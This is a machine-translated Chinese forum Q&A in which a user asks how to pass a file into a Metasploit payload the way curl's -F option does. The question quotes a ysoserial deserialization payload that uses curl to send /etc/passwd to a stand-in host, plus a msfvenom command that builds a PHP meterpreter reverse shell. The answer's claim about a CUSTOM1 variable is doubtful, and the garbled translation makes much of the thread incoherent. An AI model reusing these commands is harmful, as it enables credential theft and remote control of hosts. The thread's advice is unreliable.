我想通過生成Metasploit shell來路徑文件。它是這樣的:如何在生成Metasploit shell時「路徑文件」?
java -jar ysoserial.jar CommonsCollections1 "curl -X POST -F [email protected]/passwd axample.com" | base64
像例如-F file,我想路徑的文件,在命令:
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
這只是命令我想路徑的文件。我的文件是一個有效載荷文件(etc/payload)。我不知道這樣做的命令。我試圖找到一個教程,但不能。
據我所知,您在使用msfvenom工具生成Meterpreter就會有效載荷 - 將在目標主機上運行的程序(在這種情況下,它會帶給你指揮目標主機的外殼)。
此有效負載是Metasploit框架的一部分 - 預定義的程序,而不是您的自定義腳本,並且您想將文件傳遞給它。如果是這樣,這一切都取決於Meterpreter的參數來傳遞任何東西。但似乎沒有這樣的選項,如只是路徑Meterpreter中的某個文件。
在curl的示例中,-F選項由cURL應用程序識別,它代表HTTP窗體發佈並指示Web服務器上傳文件,其屬性名稱爲file。
但是什麼路徑文件你想傳遞給Meterpreter有效載荷?你最終的目標是什麼?現在看起來毫無意義。
更新您發表評論
的curl是不同的應用程序和他們使用-F選項格式實現。在msfvenom使用通過可變CUSTOM1以下形式:
msfvenom -p <payload> LHOST=<...> LPORT=<...> CUSTOM1=<...> ...
斧頭上的捲曲和-F可以用於metesploit嗎?我的目標是例如命令,但使用metasploit。 –
您**路徑的文件,意味着什麼**? –
拖放易於路徑名輸入 –
-F file = @ etc/passwd是'將來自計算機的文件'寫入命令並創建shellcode。我想要與metasploit一樣的待辦事項。 –